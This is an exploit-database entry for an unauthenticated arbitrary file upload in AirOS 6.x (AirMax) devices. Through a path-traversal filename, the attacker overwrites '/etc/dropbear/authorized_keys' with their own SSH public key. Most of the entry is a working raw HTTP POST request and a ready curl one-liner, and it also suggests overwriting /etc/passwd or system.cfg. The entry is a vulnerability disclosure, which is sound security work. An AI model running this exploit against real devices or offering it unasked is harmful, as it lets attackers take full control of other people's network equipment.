AirOS 6.x - Arbitrary File Upload

2016-04-15T00:00:00
ID 1337DAY-ID-25005
Type zdt
Reporter 93c08539
Modified 2016-04-15T00:00:00

Description

Exploit for cgi platform in category web applications

                                        
                                            EDB-Note Source: https://hackerone.com/reports/73480
 
Vulnerability
 
It's possible to overwrite any file (and create new ones) on AirMax systems, because the "php2" (maybe because of a patch) don't verify the "filename" value of a POST request. It's possible to a unauthenticated user to exploit this vulnerability.
Example
 
Consider the following request:
 
POST https://192.168.1.20/login.cgi HTTP/1.1
Cookie: $Version=0; AIROS_SESSIONID=9192de9ba81691e3e4d869a7207ec80f; $Path=/; ui_language=en_US
Content-Type: multipart/form-data; boundary=---------------------------72971515916103336881230390860
Content-Length: 773
User-Agent: Jakarta Commons-HttpClient/3.1
Host: 192.168.1.20
Cookie: $Version=0; AIROS_SESSIONID=7597f7f30cec75e1faef8fb608fc43bb; $Path=/; ui_language=en_US
 
-----------------------------72971515916103336881230390860
Content-Disposition: form-data; name="keyfile"; filename="../../etc/dropbear/authorized_keys"
Content-Type: application/vnd.ms-publisher
 
{{Your Public Key HERE}}
-----------------------------72971515916103336881230390860--
 
The web server must filter the file name ../../etc/dropbear/authorized_keys to just authorized_keys or return a 404. But the AirMax just received the file, overwriting the original (creating if don't exist) in the process. In this case the attacker are uploading arbitrary public ssh keys, but it can be used to upload configurations, or "/etc/passwd"...
Consequences
 
It's possible to take control over any AirMax Product with simple forged http POST request, what it disastrous.
 
 
Reproducing
 
With a simple command:
curl -F "[email protected]/id_rsa.pub;filename=../../etc/dropbear/authorized_keys" -H "Expect:" 'https://192.168.1.20/login.cgi' -k
 
Of course if the ssh is disabled you can overwrite /etc/passwd and/or /tmp/system.cfg.

#  0day.today [2018-01-08]  #